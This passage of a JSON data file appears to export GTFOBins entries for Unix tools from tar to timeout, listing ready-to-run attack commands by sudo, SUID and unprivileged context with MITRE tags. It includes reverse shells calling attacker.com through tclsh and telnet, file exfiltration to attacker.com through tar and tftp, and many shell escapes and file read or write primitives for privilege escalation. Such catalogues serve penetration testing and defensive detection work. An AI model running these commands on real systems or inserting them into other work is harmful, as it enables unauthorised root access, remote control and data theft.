target.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:upload:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:upload:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:upload:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:task:shell:0:sudo","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/task/"]},{"id":"gtfo:task:shell:0:suid","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/task/"]},{"id":"gtfo:task:shell:0:unprivileged","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/task/"]},{"id":"gtfo:taskset:shell:0:sudo","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/taskset/"]},{"id":"gtfo:taskset:shell:0:unprivileged","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/taskset/"]},{"id":"gtfo:tasksh:shell:0:sudo","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tasksh/"]},{"id":"gtfo:tasksh:shell:0:suid","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tasksh/"]},{"id":"gtfo:tasksh:shell:0:unprivileged","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tasksh/"]},{"id":"gtfo:tbl:file-read:0:sudo","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tbl/"]},{"id":"gtfo:tbl:file-read:0:suid","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tbl/"]},{"id":"gtfo:tbl:file-read:0:unprivileged","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tbl/"]},{"id":"gtfo:tclsh:library-load:0:capabilities","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:library-load:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:library-load:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:library-load:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:reverse-shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:reverse-shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:reverse-shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:shell:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:shell:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tclsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tcpdump:command:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file -Z root","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:command:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command >/path/to/temp-file\nchmod +x /path/to/temp-file\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /path/to/temp-file","description":"This requires some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:command:1:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:command:1:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"tcpdump -ln -i lo -w 'command-argument' -W 1 -G 1 -z /path/to/command","description":"This require some traffic to be actually captured. Also note that the `command-argument` string is both passed to the command and written as file, hence some restrictions apply.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:file-write:0:sudo","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:file-write:0:suid","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcpdump:file-write:0:unprivileged","toolId":"gtfo:tcpdump","toolName":"tcpdump","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcpdump -ln -i lo -w /path/to/output-file -c 1 -Z user","description":"This saves the packet dump (count is 1) from the loopback interface to a file. To trigger the capture use something like:\n\n```\nnc -u localhost 1 <<<DATA\n```\n\nWhile `user` is the owner of the packet dump file, the invoking user must be able to capture traffic on the device.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcpdump/"]},{"id":"gtfo:tcsh:file-write:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:file-write:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tcsh -bc 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:file-write:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tcsh -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:shell:0:sudo","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:shell:0:suid","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tcsh -b","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tcsh:shell:0:unprivileged","toolId":"gtfo:tcsh","toolName":"tcsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tcsh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tcsh/"]},{"id":"gtfo:tdbtool:shell:0:sudo","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tdbtool/"]},{"id":"gtfo:tdbtool:shell:0:suid","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tdbtool/"]},{"id":"gtfo:tdbtool:shell:0:unprivileged","toolId":"gtfo:tdbtool","toolName":"tdbtool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tdbtool\n! /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tdbtool/"]},{"id":"gtfo:tee:file-write:0:sudo","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tee/"]},{"id":"gtfo:tee:file-write:0:suid","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tee/"]},{"id":"gtfo:tee:file-write:0:unprivileged","toolId":"gtfo:tee","toolName":"tee","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | tee /path/to/output-file","description":"Use `-a` to append data to exising files.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tee/"]},{"id":"gtfo:telnet:reverse-shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:reverse-shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:reverse-shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\ntelnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:shell:0:sudo","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:shell:0:suid","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:telnet:shell:0:unprivileged","toolId":"gtfo:telnet","toolName":"telnet","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"telnet\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/telnet/"]},{"id":"gtfo:terraform:file-read:0:sudo","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/terraform/"]},{"id":"gtfo:terraform:file-read:0:suid","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/terraform/"]},{"id":"gtfo:terraform:file-read:0:unprivileged","toolId":"gtfo:terraform","toolName":"terraform","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"terraform console\nfile(\"/path/to/input-file\")","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/terraform/"]},{"id":"gtfo:tex:shell:0:sudo","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tex/"]},{"id":"gtfo:tex:shell:0:suid","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tex/"]},{"id":"gtfo:tex:shell:0:unprivileged","toolId":"gtfo:tex","toolName":"tex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tex/"]},{"id":"gtfo:tftp:download:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:download:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:download:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"tftp attacker.com\nget /path/to/input-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:upload:0:sudo","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:upload:0:suid","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tftp:upload:0:unprivileged","toolId":"gtfo:tftp","toolName":"tftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tftp attacker.com\nput /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tftp/"]},{"id":"gtfo:tic:file-read:0:sudo","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tic/"]},{"id":"gtfo:tic:file-read:0:suid","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tic/"]},{"id":"gtfo:tic:file-read:0:unprivileged","toolId":"gtfo:tic","toolName":"tic","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tic -C /path/to/input-file","description":"This translates a terminfo file from source format into compiled format. It will attempt to translate an arbitrary file and output the contents of the file on failure.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tic/"]},{"id":"gtfo:time:shell:0:sudo","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/time/"]},{"id":"gtfo:time:shell:0:suid","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"time /bin/sh -p","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/time/"]},{"id":"gtfo:time:shell:0:unprivileged","toolId":"gtfo:time","toolName":"time","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"time /bin/sh","description":"Note that the shell might have its own builtin `time` implementation, which may behave differently than the binary, which is often located at `/usr/bin/time`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/time/"]},{"id":"gtfo:timedatectl:inherit:0:sudo","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timedatectl/"]},{"id":"gtfo:timedatectl:inherit:0:unprivileged","toolId":"gtfo:timedatectl","toolName":"timedatectl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"timedatectl list-timezones","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timedatectl/"]},{"id":"gtfo:timeout:shell:0:sudo","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/timeout/"]},{"id":"gtfo:timeout:shell:0:suid","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"timeout 0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/timeout/"]},{"id":"gtfo:timeout:shell:0:unprivileged","toolId":"gtfo:timeout","toolName":"timeout","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"timeout 0 